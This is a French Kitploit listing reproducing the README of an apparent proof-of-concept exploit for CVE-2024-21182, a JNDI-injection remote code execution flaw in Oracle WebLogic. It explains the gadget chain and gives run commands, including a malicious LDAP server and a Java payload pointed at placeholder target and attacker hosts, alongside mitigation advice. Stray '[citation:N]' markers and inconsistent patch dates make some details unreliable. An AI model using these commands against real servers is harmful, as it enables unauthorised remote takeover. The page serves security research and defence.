Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE — Exploit de preuve de concept pour CVE-2024-21182, une injection JNDI non authentifiée menant à une exécution de code à distance sur Oracle WebLogic Server via les protocoles T3/IIOP. Inclut un laboratoire Docker pour les tests. | Kitploit
Outils/GitHubGitHub/fevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges UtilesLabs et Pratique
GitHubfevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE

Exploit de preuve de concept pour CVE-2024-21182, une injection JNDI non authentifiée menant à une exécution de code à distance sur Oracle WebLogic Server via les protocoles T3/IIOP. Inclut un laboratoire Docker pour les tests.

Voir le dépôt
il y a 2 moisPas encore vérifié

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 - Injection JNDI dans Oracle WebLogic Server → RCE

CVE-2024-21182 CVSS CISA KEV

📋 Description

CVE-2024-21182 est une vulnérabilité d'injection JNDI non authentifiée affectant le composant Core d'Oracle WebLogic Server. Elle permet à un attaquant distant, via les protocoles T3 ou IIOP, d'exécuter du code arbitraire (RCE) sur le serveur, pouvant obtenir un accès complet à toutes les données du serveur[citation:5][citation:8][citation:9].

Ce dépôt contient une Preuve de Concept (PoC) fonctionnelle qui démontre l'exploitation réussie du correctif de CVE-2023-21839 via la chaîne de gadgets AggregatableOpaqueReference + MessageDestinationReference[citation:2][citation:4].

🚨 Détails de la Vulnérabilité

Vecteur d'attaque

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • Réseau (AV:N): Exploitable à distance
  • Faible complexité (AC:L): Aucune condition spéciale
  • Aucune authentification (PR:N): Accès anonyme
  • Aucune interaction utilisateur (UI:N): Exploitation passive

⚙️ Phases de l'Attaque

Phase 1 : Reconnaissance : Identifier les serveurs WebLogic avec les ports T3/IIOP (7001) exposés.

Phase 2 : Analyse : Déterminer si le serveur exécute une version vulnérable (12.2.1.4.0 ou 14.1.1.0.0) ou ne dispose pas du correctif d'Octobre 2024.

Phase 3 : Exploitation (flux technique) :

  1. Construction du Gadget : L'attaquant crée un objet AggregatableOpaqueReference[citation:2].
  2. Injection de Référence : Par réflexion (Java), le champ privé referent de l'objet précédent est modifié pour pointer vers un MessageDestinationReference malveillant[citation:4].
  3. Bind et Lookup : L'objet malveillant est "lié" (bind) dans l'arbre JNDI du serveur, puis "recherché" (lookup).
  4. Résolution JNDI : Lors de la recherche de l'objet, le serveur exécute une nouvelle requête JNDI vers l'URL contrôlée par l'attaquant (serveur LDAP).
  5. Serveur LDAP : Répond avec une référence vers un code Java hébergé sur le serveur HTTP de l'attaquant.
  6. Exécution de Code : Le serveur WebLogic télécharge et instancie la classe Java, exécutant son contenu dans le contexte de la machine victime.

🛠️ Prérequis

  • Docker et Docker Compose : Pour l'environnement de test isolé[citation:2].
  • JDK 8 ou supérieur : Pour compiler et exécuter le client T3.
  • Client T3 de WebLogic : wlthint3client.jar (peut être extrait d'une installation de WebLogic).

🚀 Utilisation du PoC

Environnement de Laboratoire (Docker)

root@kitploit:~
# 1. Cloner le dépôt
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182

# 2. Démarrer le laboratoire (victime + attaquant)
docker-compose up -d

# 3. Exécuter l'exploitation automatique
./validate.sh

Exploitation contre une cible réelle (autorisée)

root@kitploit:~
# 1. Démarrer le serveur LDAP/HTTP malveillant
python3 exploit/ldap_server.py

# 2. Dans un autre terminal, exécuter le payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil

📊 Impact Démontré

  • Exécution de commandes à distance (RCE) sur le serveur
  • Accès non autorisé aux données critiques de l'application
  • Compromission complète du serveur d'applications
  • Potentielle porte d'entrée pour un mouvement latéral dans le réseau d'entreprise
  • Base pour le déploiement de ransomware ou d'autres charges malveillantes

Statut actuel selon CISA : "Connu comme étant utilisé dans des campagnes de ransomware ? Inconnu" (Mais typiquement oui, les RCE dans les middlewares sont un vecteur initial dans les intrusions de ransomware).

🛡️ Atténuation

  • Corriger immédiatement : Appliquer le Critical Patch Update d'Oracle d'Octobre 2024 ou ultérieur.
  • Restriction réseau : Bloquer/limiter l'accès aux ports T3/IIOP (ex. 7001) uniquement aux sources de confiance.
  • Surveillance : Détecter les tentatives de bind/lookup inhabituelles dans l'arbre JNDI.

⚠️ Avis Légal

Ce code est uniquement à des fins éducatives et de recherche. Toute utilisation abusive de cette PoC contre des systèmes sans autorisation expresse est illégale. L'auteur décline toute responsabilité en cas d'utilisation abusive de ces informations.

📚 Références

  • NVD - CVE-2024-21182
  • CISA KEV Catalog
  • Oracle Security Advisory
  • Analyse technique originale

🤝 Crédits

  • Chercheur original ayant découvert la chaîne de gadgets
  • dinosn pour le laboratoire reproductible en Docker
Télécharger l’outil
AttributValeur
CVECVE-2024-21182
ProduitOracle WebLogic Server (Core)
Versions affectées12.2.1.4.0 et 14.1.1.0.0[citation:7]
Correctif disponibleOracle Critical Patch Update (Juillet 2024 et Octobre 2024)[citation:6]
Statut dans CISA KEVExploitation active confirmée (ajoutée le 01/06/2026)[citation:3][citation:8]
Date limite d'atténuation (CISA)04/06/2026[citation:8]